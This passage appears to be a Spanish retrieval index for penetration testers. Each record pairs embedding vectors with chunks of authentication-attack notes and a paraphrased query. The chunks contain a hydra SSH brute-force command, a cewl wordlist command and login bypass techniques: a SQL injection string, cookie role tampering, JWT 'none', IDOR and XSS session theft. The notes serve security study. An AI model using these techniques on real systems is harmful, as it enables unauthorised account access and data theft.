-0.0556, 0.01454, 0.09044, -0.18175, 0.03189, -0.06495, 0.11819, 0.11335, -0.03498, 0.01801, -0.0086, -0.09358, 0.06326, 0.13597, 0.09843, 0.00615, 0.04611, -0.1399, -0.0747, 0.03538, 0.02629, -0.01972, 0.05497, 0.04037, 0.09856, -0.04327, -0.04464, -0.17165, -0.02805, -0.09972, -0.13165, 0.08974, -0.16933, -0.07364, -0.02038, -0.16483, 0.05274, -0.02597, -0.1031, 0.00437, -0.08431, -0.036, -0.07964, -0.04815, -0.01698, -0.11731, -0.02071, 0.01101, 0.03881, -0.06245, 0.03104, 0.03919, 0.12561, 0.00379, -0.02609, -0.03235, -0.01969, -0.15899, 0.00303, -0.08369, -0.05784, 0.08456, -0.03273, -0.04715, -0.1004, -0.00101, 0.03224, -0.04944, -0.01629, -0.03853, 0.04369, -0.01632, -0.0771, 0.00992, -0.08927, 0.04887, -0.10875, -0.09164, -0.00758, 0.06844, -0.01482, -0.05527, -0.01456, -0.04344, 0.01459, -0.0053, -0.07, -0.01947, 0.00776, -0.01778, 0.01175, -0.1037, -0.08683, -0.01809, 0.02114, -0.06508, 0.02207, -0.05358, 0.04485, -0.05447, 0.07048, 0.01577, 0.01734, -0.01145, -0.12474, 0.05663, -0.0177, 0.04364, 0.0712, 0.00809, -0.02499, 0.06106, -0.14049, 0.02031, -0.09266, 0.06074, 0.08048, 0.01944, -0.09072, 0.03122, 0.05248, 0.02976, -0.02862, -0.0653, -0.0102, 0.10518, -0.04272, 0.02224, 0.06414, -0.05798, -0.00781, -0.00015, -0.04966, -0.08181, 0.05535, -0.04537, -0.04867, -0.05291, 0.02333, -0.00343, -0.00526, -0.04571, -0.0149, 0.06419, 0.08925, 0.03763, -0.00503, 0.10087, 0.01215, 0.00625, -0.10798, -0.06424, 0.04607, -0.02366, -0.03338, -0.04106, -0.01771, -0.06125, 0.00012, -0.00245, -0.00843, 0.0576, -0.03355, 0.05607, 0.0197, -0.00842, 0.05776, 0.00729, -0.01014, 0.02251, -0.04058, -0.03687, -0.02808, 0.04024, 0.01126, -0.03279, -0.05925, -0.05801, -0.02142, 0.07162, 0.08768, 0.01356, -0.03238, -0.01908, 0.03211, 0.02555, -0.00377, 0.05835, -0.03922, -0.03537, -0.0293, 0.01807, 0.01306, 0.03864, 0.0045, -0.02577, 0.01616, 0.00302, -0.01064, -0.01703, 0.0287, 0.00279, -0.0914, 0.05518, 0.03681, 0.02581, -0.06127, -0.00505, -0.00571, -0.01157, -0.04479, 0.03839, 0.0151, -0.09097, 0.01202, -0.04902, 0.03024, -0.01543, -0.06508, -0.05948, -0.04285, -0.03205, -0.03448, -0.02726, -0.04066, -0.00184, 0.03891, 0.06002, -0.01496, 0.0039, -0.0102]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SSH (si hay user vΓ‘lido):\nhydra -l bob -P rockyou.txt ssh://IP\n```\n- El `:F=mensaje` o `:S=Γ©xito` es lo que distingue fallo de acierto β†’ cΓ³gelo en Burp Repeater e Intruder.", "indexar": "con quΓ© puedo probar contraseΓ±as automΓ‘ticamente contra servidores remotos?", "v": [0.16471, 0.06883, -0.12947, -0.1333, 0.0561, 0.03448, 0.13762, -0.0739, -0.10522, -0.059, -0.11019, -0.00512, 0.10325, -0.06886, 0.08834, 0.05977, 0.12636, 0.02984, 0.01047, 0.0751, 0.07873, -0.15889, -0.00726, 0.00036, -0.00368, -0.03108, 0.12396, 0.0093, -0.07142, -0.0655, 0.01309, -0.04554, 0.0944, 0.02031, -0.05175, 0.08503, -0.02735, 0.20635, 0.01053, 0.06952, 0.17018, 0.01149, -0.15774, -0.00373, 0.01469, 0.00247, 0.00287, -0.03706, 0.02905, -0.05727, -0.10249, -0.0962, -0.04102, -0.09728, -0.09634, -0.03364, 0.16652, -0.00545, 0.02644, 0.02294, -0.08636, 0.045, 0.04482, 0.08774, 0.00249, -0.12314, -0.01172, -0.05326, -0.14435, 0.04315, -0.07065, 0.01063, -0.01543, -0.00751, -0.02242, 0.08169, -0.05014, -0.0313, 0.07807, 0.0597, -0.11946, -0.00768, -0.0222, -0.01656, -0.15084, -0.11256, -0.01156, -0.01342, 0.02486, -0.06956, 0.08518, -0.00152, 0.02192, 0.05556, 0.03816, -0.02899, 0.09611, -0.04934, -0.03951, -0.02231, -0.03953, 0.0327, 0.01297, 0.13264, -0.05681, 0.02226, 0.05043, -0.03123, 0.0473, -0.09842, 0.02043, -0.04935, -0.08597, -0.03459, -0.01758, -0.0921, -0.04386, -0.04442, 0.04562, 0.06103, -0.07677, -0.03531, 0.05031, 0.04615, 0.05508, -0.00723, 0.01344, 0.05101, -0.0154, -0.04176, 0.00726, -0.02245, -0.05854, -0.02946, -0.0422, 0.05447, 0.00359, -0.10333, -0.06568, -0.06627, 0.00071, 0.05406, 0.02772, -0.00148, 0.08741, 0.01384, 0.04672, -0.04436, -0.03024, 0.04597, -0.03919, -0.03315, 0.00183, 0.06933, -0.10278, 0.01345, -0.04544, -0.12846, -0.07466, 0.11008, 0.00921, 0.02861, -0.04484, 0.08762, -0.01129, -0.02456, -0.01126, -0.02355, 0.06065, 0.05048, -0.08447, 0.07273, -0.00749, -0.07332, -0.04616, -0.0104, -0.02927, -0.04186, 0.06187, -0.06377, -0.04931, 0.03378, -0.04499, -0.05859, 0.01644, -0.02736, 0.03831, 0.00916, 0.04937, 0.01539, 0.01937, -0.00025, -0.06653, 0.03162, 0.00972, -0.04186, -0.04597, -0.02606, -0.029, -0.05489, -0.02854, -0.02921, -0.00702, -0.04846, 0.05506, 0.00413, -0.06622, 0.0443, -0.02359, 0.0462, 0.02884, -0.03706, 0.11908, -0.05208, -0.07678, -0.03188, 0.01876, -0.06366, -0.02947, -0.0108, 0.01615, 0.02565, 0.06018, 0.02915, 0.01454, 0.0668, 0.05209, 0.04874, 0.08307, -0.01189, -0.02205, 0.05733, -0.03215, -0.02175, 0.05723, -0.01302, -0.00217, -0.08906, -0.03935, -0.02358, -0.04018, 0.08089, -0.00954, -0.09231, -0.05003, -0.11491, -0.07992, 0.023, -0.01672, -0.01069, -0.04127, 0.02741, 0.04416, 0.00327, -0.01316, -0.03461]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SSH (si hay user vΓ‘lido):\nhydra -l bob -P rockyou.txt ssh://IP\n```\n- El `:F=mensaje` o `:S=Γ©xito` es lo que distingue fallo de acierto β†’ cΓ³gelo en Burp Repeater e Intruder.", "indexar": "cΓ³mo hago un ataque intrusivo a la lΓ­nea de comandos usando hydra?", "v": [0.01325, 0.04225, -0.20633, 0.00323, 0.08095, -0.03187, -0.06119, 0.02179, -0.07811, 0.06068, -0.09006, -0.07533, 0.00733, 0.00865, 0.05138, -0.01979, 0.1129, 0.00993, -0.04227, -0.12475, -0.09924, 0.1091, -0.01509, 0.01343, -0.13188, -0.07458, -0.00525, 0.05041, -0.12926, -0.15847, -0.01319, -0.0297, 0.03014, 0.09092, -0.14122, -0.06929, -0.16622, 0.09234, 0.06639, 0.19195, -0.10368, 0.02959, -0.14455, -0.08251, 0.07888, -0.06963, 0.01951, 0.02899, 0.04829, 0.00067, -0.02364, -0.00482, -0.16244, -0.00822, -0.07107, -0.08182, 0.04673, -0.03935, 0.06589, -0.00269, -0.06081, -0.04934, 0.0704, 0.08327, -0.02276, -0.0612, -0.04076, -0.12915, -0.05625, 0.00186, -0.03229, 0.03392, -0.07383, 0.04518, 0.13314, -0.00248, -0.00381, 0.03252, 0.13997, -0.01979, -0.0341, -0.02806, -0.05422, -0.02184, -0.13558, -0.10612, 0.00531, -0.10211, -0.02668, -0.02943, 0.05125, -0.03412, -0.06459, -0.01295, -0.04984, -0.02171, -0.05692, -0.04784, 0.11917, -0.03599, -0.00876, 0.00643, -0.12685, 0.12803, 0.02015, 0.05878, -0.02213, -0.0722, 0.01429, -0.0872, -0.00328, -0.06732, -0.03947, -0.08436, 0.06596, -0.05577, -0.04257, -0.03808, -0.00482, -0.04319, -0.13743, -0.00721, 0.07298, 0.07769, -0.01142, -0.04265, -0.05639, -0.0098, -0.01251, -0.00607, -0.04895, 0.03485, 0.0804, -0.05589, -0.0283, 0.07467, -0.04709, -0.0238, -0.14612, -0.06196, 0.04847, 0.09354, 0.01384, 0.04248, 0.00012, 0.02726, -0.00933, -0.07425, -0.15366, 0.03676, 0.04211, 0.02465, -0.05055, 0.10809, -0.05175, -0.02883, -0.00044, -0.05121, -0.03624, 0.11083, -0.02543, 0.00666, 0.00184, 0.01661, -0.0029, -0.04009, -0.08033, -0.07221, 0.02532, 0.01288, 0.00284, 0.03806, -0.02695, -0.05045, 0.00088, -0.03901, -0.0277, 0.00645, 0.0528, 0.01174, -0.03993, -0.00666, -0.07898, -0.00635, -0.0512, -0.06941, 0.02788, -0.00256, 0.02731, 0.0258, -0.00958, 0.05326, -0.06109, 0.01727, -0.01949, -0.04169, -0.03193, -0.00445, -0.00309, -0.03564, -0.02816, 0.0216, 0.04524, -0.07544, 0.06484, 0.06162, -0.0454, -0.00474, -0.04364, 0.07331, 0.07389, -0.06985, 0.07503, -0.03804, -0.06204, -0.00431, 0.03661, -0.03386, -0.0496, -0.01501, 0.04586, 0.05534, 0.03983, 0.01459, -0.01659, 0.00477, -0.04194, -0.02707, 0.01621, 0.07039, -0.0166, -0.02204, -0.04722, -0.08444, 0.04817, -0.01339, 0.023, 0.0114, -0.07008, -0.0535, 0.02215, 0.02502, -0.0125, -0.06974, -0.02992, -0.08811, -0.0779, 0.05144, 0.01683, -0.03577, 0.01295, -0.00988, -0.00447, -0.04496, 0.037, -0.0349]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 3. Wordlists a medida\n```bash\ncewl http://IP -w custom.txt # palabras de la propia web", "indexar": "que programa puedo usar para generar una lista personalizada de palabras relacionadas con mi sitio web?", "v": [-0.05698, 0.18498, -0.1929, -0.16546, -0.08085, -0.15837, -0.01841, -0.08297, -0.1324, -0.15023, -0.04023, -0.08825, 0.02388, -0.09739, -0.00235, 0.00356, 0.1323, -0.05642, 0.11342, 0.01683, 0.02815, -0.02139, -0.08515, -0.10797, -0.10201, -0.08503, 0.11615, -0.07739, -0.0558, 0.08939, -0.01001, 0.03896, -0.00799, -0.08074, -0.07417, 0.00754, 0.07489, 0.05868, -0.00467, -0.02443, -0.00385, -0.00201, -0.1271, 0.10129, 0.00427, 0.05347, -0.01409, -0.07282, -0.05464, -0.0311, -0.01674, -0.04238, -0.08534, 0.03858, 0.07163, -0.06116, 0.11174, -0.13893, -0.05852, 0.02226, -0.07387, 0.04962, -0.01412, -0.01155, -0.02879, 0.03018, 0.06435, 0.09102, -0.05916, 0.02902, -0.00317, -0.01811, 0.07688, -0.06535, 0.16045, 0.076, 0.03989, 0.00998, 0.03399, 0.06629, -0.02544, -0.02357, 0.02021, 0.08561, -0.11623, 0.01399, 0.03346, -0.01557, 0.04347, -0.04094, 0.01196, 0.01005, -0.05666, 0.00748, -0.01374, -0.15473, 0.05448, 0.04546, 0.03785, 0.0087, 0.08723, -0.05491, -0.00767, 0.05643, -0.01849, 0.0214, 0.08876, 0.02382, -0.04375, 0.01547, 0.06422, -0.05434, -0.08083, -0.13612, -0.06116, 0.00821, -0.03941, -0.02634, 0.06224, -0.1361, -0.08512, 0.05263, -0.03723, 0.00751, 0.05091, 0.0676, -0.00563, 0.09972, -0.11674, 0.00751, -0.01796, 0.05718, -0.03422, -0.14324, -0.02237, -0.00959, 0.02666, 0.02504, 0.10577, 0.00641, -0.03153, -0.02162, -0.08064, 0.02673, -0.00469, -0.07235, -0.01175, -0.02363, -0.10027, -0.00311, -0.01194, -0.01151, 0.02528, 0.04213, -0.0897, -0.0157, 0.02595, -0.02317, 0.01041, 0.00568, -0.03307, 0.00033, -0.02217, -0.00595, 0.10788, 0.04549, -0.04462, 0.09219, 0.08716, 0.12144, -0.04, 0.1179, 0.07257, -0.10371, -0.0117, 0.01861, -0.01151, -0.0198, -0.02917, -0.10315, -0.09436, 0.01075, -0.03788, -0.0292, 0.00372, -0.02333, 0.09183, -0.00302, -0.03094, 0.04939, -0.09383, 0.03062, -0.04428, -0.02696, 0.04809, 0.02084, 0.02902, 0.02918, -0.01228, -0.11274, -0.01242, -0.04375, -0.00401, -0.01457, -0.02565, 0.10168, -0.01621, -0.05077, 0.03605, 0.05954, -0.00744, -0.00773, 0.0181, -0.00262, -0.04877, -0.04031, 0.01319, -0.00807, 0.03074, 0.03658, 0.05426, 0.0227, 0.03688, 0.04692, 0.01878, -0.06445, 0.00349, -0.01483, 0.0036, 0.03706, -0.07351, -0.03157, -0.04834, -0.08022, 0.00037, -0.03777, -0.01258, -0.01824, -0.05706, -0.0379, -0.01057, 0.08675, 0.00394, -0.01821, -0.04986, -0.04097, -0.04381, -0.00616, -0.0346, -0.01284, -0.06848, -0.02156, 0.00401, -0.02446, 0.06554, 0.06531]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 3. Wordlists a medida\n```bash\ncewl http://IP -w custom.txt # palabras de la propia web", "indexar": "cual es una alternativa libre o de cΓ³digo abierto a cewl para hacer wordlists?", "v": [-0.119, -0.00553, -0.0525, 0.0218, -0.15879, -0.18991, -0.02369, 0.01232, -0.12202, -0.12899, -0.0985, -0.36148, 0.00517, -0.01944, 0.08111, -0.09696, 0.09575, -0.08718, 0.07587, -0.02914, -0.12259, -0.00996, -0.14181, -0.09087, -0.05702, -0.08623, -0.02223, 0.02788, -0.09491, 0.01206, -0.03797, -0.00998, 0.06922, 0.01627, -0.01085, 0.15576, 0.18436, 0.12713, 0.03644, 0.02466, -0.0893, -0.02393, -0.08928, 0.13934, -0.00727, -0.08845, -0.01733, 0.05885, 0.02089, 0.0341, -0.0546, -0.0631, -0.01797, -0.03561, 0.11753, -0.0097, 0.0815, -0.06411, -0.15313, -0.008, -0.00021, 0.00957, 0.03504, -0.0817, 0.00525, -0.02698, 0.03476, 0.09993, -0.02614, 0.10593, 0.05804, 0.00532, -0.03799, -0.03094, -0.00585, 0.08991, -0.09258, -0.10698, -0.01961, 0.10364, 0.00188, -0.05279, 0.05085, 0.01199, 0.01985, -0.07006, 0.024, -0.09045, -0.03837, -0.00436, 0.08659, 0.06284, -0.04358, 0.14028, 0.042, -0.08029, -0.06159, 0.13024, -0.02375, 0.06094, 0.05504, -0.06098, -0.05656, -0.02426, 0.07166, -0.0091, -0.00517, 0.04159, -0.08763, 0.06962, -0.0178, -0.02523, -0.05633, 0.00202, -0.03105, -0.07444, -0.07961, 0.02519, 0.00668, -0.02074, -0.05491, -0.00875, -0.10423, -0.00985, 0.02378, 0.10111, 0.04343, 0.0522, -0.05905, 0.00448, 0.00687, 0.00805, -0.06617, -0.07767, -0.04109, -0.0274, 0.09906, 0.01965, 0.0417, 0.08958, -0.03654, -0.03617, 0.0368, 0.07027, -0.00027, -0.00886, -0.0035, -0.02808, -0.06458, -0.05137, -0.0629, 0.05981, -0.02155, 0.05602, -0.02733, 0.00322, -0.03299, 0.02096, -0.03016, 0.05124, -0.03466, -0.03061, -0.03467, -0.03751, -0.00822, -0.01757, 0.01373, -0.00485, -0.05132, -0.04686, 0.01875, 0.04081, 0.12784, -0.05249, 0.06933, -0.04907, -0.01933, -0.05729, -0.04982, -0.0839, 7e-05, 0.03723, -0.00661, -0.04139, 0.02194, -0.01817, 0.049, 0.02589, -0.03468, 0.00951, -0.04397, 0.00423, -0.03541, -0.06122, -0.00759, 0.03781, 0.07324, -0.03049, -0.06471, -0.06546, -0.02448, -0.0093, 0.00571, -0.07868, -0.04701, 0.01976, 0.00401, 0.02677, 0.01566, 0.08088, 0.04615, 0.01237, 0.06014, 0.01894, -0.04342, 0.01781, -0.06322, 0.04483, 0.04725, -0.03499, 0.03605, 0.00194, -0.03781, 0.00103, 0.00485, 0.01627, -0.03344, 0.02765, 0.0039, -0.01513, -0.00082, -0.01714, 0.01776, 0.03336, 0.02805, 0.02037, -0.01534, 0.02037, 0.00765, 0.00761, 0.01151, 0.03707, -0.04041, -0.02093, -0.0163, 0.01265, -0.03684, -0.03698, -0.06237, -0.00935, -0.0658, -0.01661, -0.00907, -0.01844, 0.027, 0.00898]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 3. Wordlists a medida\n```bash\ncewl http://IP -w custom.txt # palabras de la propia web", "indexar": "con que herramienta puedo crear un archivo .txt con las palabras clave que usa la propia pΓ‘gina?", "v": [0.02119, 0.03134, -0.03842, -0.16704, 0.00708, -0.18366, -0.06105, -0.00218, 0.02421, -0.04754, -0.10986, -0.04492, 0.01416, -0.00467, 0.06249, 0.01981, 0.22111, -0.12404, 0.13095, -0.04797, 0.04621, -0.02766, -0.07234, -0.06634, -0.14046, -0.171, 0.05186, 0.04726, -0.1516, 0.10492, -0.07262, 0.08523, 0.05426, -0.01087, -0.04508, 0.08121, 0.02117, 0.13476, -0.09852, 0.10605, 0.05704, 0.04862, -0.17818, 0.21963, -0.0326, 0.03885, -0.0189, 0.05384, -0.02567, 0.07181, -0.00323, -0.17443, -0.09848, -0.00375, -0.06176, -0.12445, 0.21095, -0.16435, -0.01773, -0.03556, -0.15748, 0.11625, -0.02587, -0.04273, -0.07005, -0.01248, 0.00454, -0.01356, -0.04909, 0.09807, -0.01727, 0.04442, 0.03732, -0.02174, 0.02897, 0.02121, -0.0141, -0.05682, -0.05361, 0.02869, 0.00418, -0.08762, -0.04487, -0.06221, -0.06839, -0.0984, 0.05211, 0.04841, 0.04324, -0.09942, 0.01596, -0.01198, -0.01748, 0.01791, 0.00178, -0.0679, 0.00808, -0.03505, 0.03263, -0.05147, 0.0234, -0.01931, -0.01763, 0.01069, 0.09949, 0.0006, 0.00255, 0.0178, -0.01161, 0.01185, 0.12788, 0.01207, 0.0842, -0.02631, -0.09137, 0.01366, -0.01926, -0.02648, -0.04019, -0.10949, 0.02451, -0.0704, -0.03099, 0.04909, -0.06359, 0.00281, -0.08214, 0.03127, -0.09367, -0.04532, -0.00719, 0.05148, -0.07967, -0.04549, 0.04613, 0.03737, 0.0171, -0.00056, -0.00617, -0.04037, -0.01111, -0.00175, -0.07483, -0.03276, 0.04332, -0.02999, -0.02745, -0.05942, -0.08458, -0.00595, 0.00887, -0.02191, 0.06424, 0.01963, -0.06558, 0.05745, -0.01236, -0.0058, -0.04034, 0.00205, -0.02712, -0.01805, -0.0623, 0.01899, -0.00221, -0.07171, -0.06646, 0.03404, 0.05338, 0.01813, -0.00171, -0.03546, 0.07693, -0.07559, -0.00284, -0.03311, -0.05471, -0.00755, -0.0102, -0.08234, -0.0381, -0.06087, -0.10099, -0.03886, -0.03978, -0.10091, 0.09059, -0.00924, -0.03908, 0.01985, -0.03261, 0.05058, -0.04408, -0.02025, 0.02012, -0.01829, -0.0799, 0.01641, 0.01695, -0.0446, -0.04088, -0.05997, 0.01907, -0.01027, 0.01342, 0.0163, -0.02313, -0.02047, -0.04928, -0.00269, 0.03978, 0.00921, -0.00774, -0.01545, -0.00753, -0.01473, -0.00699, 0.06704, -0.02018, -0.0186, 0.04437, 0.07455, 0.0764, -0.03463, 0.02247, -0.01617, 0.01565, 0.02495, 0.03002, 0.02333, -0.03491, 0.00266, -0.02117, -0.00171, 0.05943, -0.05101, 0.00641, 0.01198, -0.03464, -0.04368, 0.00431, 0.01675, -0.04774, -0.04758, -0.02382, 0.00954, -0.04114, 0.00612, -0.01502, -0.04066, -0.07063, -0.03421, 0.02543, -0.03154, 0.03229, -0.04487]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 4. Bypass (no fuerza bruta)\n- **SQLi en el login** β†’ `' OR '1'='1'-- -` β†’ SQL injection.\n- **Cookies/roles manipulables**: `isAdmin=false` β†’ `true`, `role=user` β†’ `admin` (en Burp Suite).\n- **JWT**: alg `none`, secreto dΓ©bil (`jwt_tool`, crackeo con rockyou).\n- **IDOR**: cambia `?id=1` por `?id=2` y accedes a datos de otro.\n- **Cookie/sesiΓ³n robada** vΓ­a XSS.\n\nRelacionado: Burp Repeater e Intruder Β· SQL injection Β· OSCP MOC", "indexar": "que programa sirve para inyectar cΓ³digo sql en los logins sin usar fuerza bruta", "v": [0.02507, -0.08425, -0.20152, -0.09861, 0.01105, -0.24236, -0.02502, -0.06715, -0.00785, -0.09948, -0.15679, -0.11196, 0.01297, -0.01287, -0.10432, -0.1199, 0.03187, -0.18596, -0.0641, -0.06775, 0.00569, -0.07307, 0.03937, -0.12624, -0.14255, 0.05919, 0.00135, 0.06209, -0.10965, -0.0542, -0.02671, 0.03189, 0.19376, -0.07356, -0.0055, 0.01266, 0.04497, 0.04404, 0.04045, 0.12394, -0.05311, 0.04394, -0.10237, 0.02163, -0.01525, 0.0236, 0.07841, 0.09381, -0.00778, 0.02175, -0.11859, -0.05345, -0.04501, -0.03894, -0.02894, -0.12415, -0.04556, -0.08949, -0.16676, 0.09748, -0.06889, -0.024, 0.00916, -0.1031, -0.02149, -0.03995, 0.07532, 0.00065, -0.04274, -0.04977, -0.14889, 0.05076, -0.08833, -0.07366, 0.00755, 0.01631, -0.01874, -0.04138, 0.02366, -0.00631, -0.07221, -0.01152, -0.07602, 0.00078, -0.04103, -0.02891, 0.13233, -0.01059, 0.02096, -0.03614, 0.08989, 0.02242, 0.02913, 0.04287, 0.07335, 0.01623, 0.04203, 0.06889, 0.06522, -0.02539, 0.05481, -0.14787, 0.0015, 0.03846, 0.12943, 0.05818, 0.07252, -0.03778, -0.0262, 0.05389, 0.01719, -0.08111, -0.16158, -0.01664, -0.06534, 0.02857, -0.06485, -0.07565, -0.04225, -0.05854, -0.11772, 0.02643, -0.04665, 0.05661, 0.02502, 0.08134, 0.07021, 0.08412, -0.00897, -0.04122, -0.01994, -0.01236, 0.01862, -0.02042, -0.01375, -0.05922, 0.03951, -0.04848, -0.01452, -0.00878, -0.00266, 0.0556, 0.05884, 0.04957, 0.04051, 0.06644, 0.03798, -0.03027, -0.05547, -0.01777, 0.08751, -0.00547, -0.00624, 0.06909, -0.0978, -0.01875, 0.06313, -0.04557, -0.08014, -0.01041, -0.08651, -0.03969, -0.07888, -0.03396, 0.03626, -0.01009, -0.04971, -0.05457, 0.06413, 0.07014, 0.05635, 0.00018, 0.1228, -0.02299, 0.03032, -0.04416, -0.00432, 0.01474, -0.02461, 0.01313, -0.03576, 0.05903, 0.08384, -0.00086, 0.002, 0.005, 0.00215, 0.04011, 0.00779, -0.0167, 0.00888, 0.07259, -0.01201, -0.0004, -0.01637, -0.03836, -0.02534, 0.02039, 0.02644, -0.06422, -0.02628, 0.02953, -0.02131, -0.04865, 0.09558, 0.07435, -0.01547, 0.01316, 0.03351, 0.04761, -0.01271, -0.04573, 0.04272, -0.01067, -0.04267, -0.03278, 0.01096, 0.05972, 0.04836, 0.01867, -0.0308, 0.03019, -0.02529, 0.00342, 0.01349, -0.04661, 0.02387, -0.01578, 0.0364, 0.07176, -0.01502, -0.02732, -0.033, 0.00694, 0.01284, 0.00176, 0.0011, 0.0139, -0.04687, -0.09226, -0.00507, 0.08695, -0.02917, -0.04231, -0.03421, 0.01983, -0.06, -0.02828, -0.01428, 0.00954, 0.00106, -0.00549, 0.05698, -0.03896, 0.0362, 0.02842]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 4. Bypass (no fuerza bruta)\n- **SQLi en el login** β†’ `' OR '1'='1'-- -` β†’ SQL injection.\n- **Cookies/roles manipulables**: `isAdmin=false` β†’ `true`, `role=user` β†’ `admin` (en Burp Suite).\n- **JWT**: alg `none`, secreto dΓ©bil (`jwt_tool`, crackeo con rockyou).\n- **IDOR**: cambia `?id=1` por `?id=2` y accedes a datos de otro.\n- **Cookie/sesiΓ³n robada** vΓ­a XSS.\n\nRelacionado: Burp Repeater e Intruder Β· SQL injection Β· OSCP MOC", "indexar": "con que puedo probar si las cookies o roles se pueden manipular para acceder como admin", "v": [0.10907, 0.07833, -0.07012, -0.11536, -0.02558, -0.09234, -0.03527, 0.23262, -0.14425, -0.15082, -0.13175, 0.02851, 0.08337, -0.02749, -0.06558, -0.1068, 0.15944, 0.01237, 0.00755, 0.08594, 0.10584, -0.03177, -0.07732, 0.01467, 0.14902, 0.07688, 0.09082, 0.03062, -0.07179, -0.0463, -0.07989, -0.05929, 0.08221, -0.05214, -0.08442, 0.04856, -0.02427, 0.02458, 0.12234, 0.10145, -0.00646, -0.0627, 0.03534, 0.03381, 0.01636, 0.079, -0.064, -0.03003, 0.05829, 0.06391, 0.04746, -0.05172, -0.10524, 0.06988, 0.01316, -0.0152, 0.0132, -0.19668, -0.01753, -0.01873, -0.02808, 0.09855, -0.01431, 0.11368, 0.00989, 0.00606, -0.02418, -0.02166, -0.00287, 0.08108, 0.04199, -0.03126, 0.02285, -0.07469, -0.02953, 0.00583, -0.0134, 0.03952, 0.02145, -0.03502, -0.01671, -0.01837, -0.08097, 0.04727, -0.03401, -0.01922, -0.03828, -0.11121, -0.01365, -0.04339, 0.13781, 0.07082, -0.02596, -0.04318, 0.00922, -0.03268, -0.01291, -0.09658, 0.03304, -0.03923, 0.05208, 0.03943, -0.0929, 0.16911, -0.0294, -0.04963, 0.03441, -0.0585, 0.02741, -0.10638, -0.06444, 0.01169, -0.14649, 0.00389, 0.08931, 0.16752, -0.07574, 0.017, -0.14856, -0.10664, -0.03203, -0.06598, -0.05993, -0.01596, 0.01172, 0.00949, 0.05974, 0.02559, -0.07305, -0.01741, -0.08678, 0.13006, -0.0147, 0.11, -0.00339, -0.01978, 0.05619, -0.01894, 0.01037, -0.00051, 0.01326, 0.01983, 0.09945, -0.08946, -0.01932, 0.05245, -0.04971, 0.05671, 0.00666, -0.08945, -0.00297, -0.01628, -0.00395, 0.10755, 0.01251, 0.00918, 0.0372, -0.07439, 0.02107, 0.06762, -0.11292, -0.03551, -0.07458, 0.02214, 0.06909, 0.00285, -0.08603, -0.11874, 0.0679, -0.00212, -0.10479, 0.02983, 0.02863, -0.00037, 0.01213, -0.06901, -0.0461, -0.01854, -0.01933, 0.0107, 0.06912, -0.04632, 0.02361, 0.0074, -0.01042, -0.03992, 0.01674, -0.00084, -0.05834, 0.10012, 0.06424, 0.0513, 0.02035, -0.00457, 0.0295, -0.01777, -0.01963, 0.05846, -0.00077, 0.01883, 0.10836, -0.04817, 0.01094, 0.02664, -0.01576, 0.04638, -0.01275, 0.02557, 0.00062, 0.02064, 0.08163, -0.02337, 0.0356, 0.021, -0.00446, -0.03827, -0.00285, 0.01036, 0.01206, 0.0371, -0.01826, 0.03927, 0.05499, 0.01287, -0.05044, -0.00611, 0.04777, 0.02349, 0.01061, 0.00353, -0.02796, 0.03698, -0.01595, 0.0191, 0.03323, 0.00179, 0.0898, -0.02568, -0.06041, -0.04724, -0.02521, 0.06487, -0.00909, -0.00186, -0.01989, -0.07011, -0.05373, -0.0145, 0.01681, -0.03659, -0.0238, 0.01566, 0.00333, -0.01266, 0.00903, 0.0209]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 4. Bypass (no fuerza bruta)\n- **SQLi en el login** β†’ `' OR '1'='1'-- -` β†’ SQL injection.\n- **Cookies/roles manipulables**: `isAdmin=false` β†’ `true`, `role=user` β†’ `admin` (en Burp Suite).\n- **JWT**: alg `none`, secreto dΓ©bil (`jwt_tool`, crackeo con rockyou).\n- **IDOR**: cambia `?id=1` por `?id=2` y accedes a datos de otro.\n- **Cookie/sesiΓ³n robada** vΓ­a XSS.\n\nRelacionado: Burp Repeater e Intruder Β· SQL injection Β· OSCP MOC", "indexar": "cual es una alternativa a Burp Suite para hacer pruebas de idor y ataques no por fuerza", "v": [-0.14026, 0.00044, -0.18764, -0.14195, -0.15156, 0.00122, 0.14021, -0.00985, 0.03117, -0.0383, -0.05853, 0.00029, -0.05607, 0.03465, -0.06619, -0.14714, 0.00923, -0.06715, -0.00364, -0.00247, 0.02171, 0.06331, -0.03987, -0.02705, -0.01622, 0.06302, -0.11823, 0.10202, -0.04789, -0.0446, -0.02538, 0.03661, 0.16028, -0.04939, -0.02554, -0.01107, 0.00437, 0.08921, 0.16252, 0.08563, -0.0312, -0.03073, -0.12117, 0.00755, -0.0228, -0.01069, -0.05455, 0.04906, 0.08851, -0.03499, -0.09518, -0.01659, -0.06015, -0.02466, -0.05285, -0.08904, 0.00563, -0.10338, -0.05058, 0.04468, -0.0507, 0.03877, 0.00536, -0.10961, 0.08797, -0.09554, -0.07991, -0.04336, -0.13404, -0.01365, -0.13472, -0.02933, -0.01813, -0.00908, -0.19703, -0.03569, 0.02601, -0.0059, -0.02066, 0.01104, -0.01857, 0.03155, -0.18038, 0.05342, -0.12733, -0.08417, 0.08769, -0.11119, 